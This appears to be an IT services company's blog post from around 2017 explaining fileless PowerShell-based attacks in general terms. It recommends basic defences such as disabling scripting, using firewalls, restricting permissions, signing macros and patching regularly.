2017 will be the year we remember the large number of coordinated network attacks across all sectors of business. Ransomware like Wannacry, NotPetya, and Bad Rabbit led the assault on businesses and infrastructure worldwide, affecting not only small and large businesses, but hospitals, ATM machines, and various other computer network infrastructures that we take for granted. Other infections are taking hold as well without detection, and are hiding in plain sight.
What is a "fileless" Attack?
A fileless attack is where hackers will use existing software within a network to carry out malicious activities. These are usually "allowed" programs and protocols that anti-malware and anti-virus programs will not pick up on, because they are considered "safe" applications. An example of this is Microsoft Windows PowerShell, a command line utility that exists in all versions of Windows. PowerShell can be instantiated in memory fed several lines of instruction including bypassing local security, and has the ability to connect to external sites to download and execute other scripts giving the attacker ever increasing access to your network. This type of attack doesn’t create files, so antivirus software is unable to find it. It can remain in memory, integrate itself into the Windows registry, or the kernel (operating system). It may also have the ability to permanently embed itself into these areas, so it can persist and continue through reboots.
An Example of How This Happens..
You’re in front of your computer at work, and you receive an email that’s a cleverly disguised (SPAM) email. You click on a link that takes you to a website that loads Flash player. Flash then instantiates PowerShell in memory (you don’t see it running but it’s running in the background), and sends a series of PowerShell instructions using command lines. This all happens in an instant and you never see a box pop up, or a warning. PowerShell then connects to a server over the internet and runs a malicious script that finds sensitive data from your machine and sends it back to the attacker. All the while, no malware is downloaded, and your anti-virus and anti-malware scanners detect – nothing.
What Your Company Can Do to Prevent These Attacks
If your organization does not use scripting languages, restrict their use by disabling them altogether. Disabling tools like PowerShell from running will help harden your internal defenses.
Another way to help defend your network is to use a industry grade firewall, you should be anyway if you are a small business. We recommend SonicWALL firewalls, because they have the digital defense tools at the gateway to stop most any type of attack – including Advanced Threat Protection or ATP. This type of firewall service analyzes traffic items coming into the network (including attachments) for harmful items. Data is analyzed, and results are sent back to the firewall in real time either with instruction to let it pass, or blocking it.
Restrict access to your sensitive data by using windows security on folders, give users only what they need access to. Password protect individual files like PDF’s, Word, and Excel documents with sensitive data on them.
Disable macros in Office programs if you don’t use them. If you do use them - then have them digitally signed (the ones you do use). That way users can employ only macros that have been reviewed and approved for use by the company.
Most importantly make sure your Windows operating systems (workstations and servers) are patched at least monthly, and that all your third-party programs (like Flash, Chrome, etc.) are all included in that patching process. The Equifax breach as we reported earlier this year could have been easily prevented, as well as most of the “Wanncry” outbreak. Basic security measures and some common sense are usually all that’s required in most cases. What keeps us up at night is that these basic practices are usually ignored.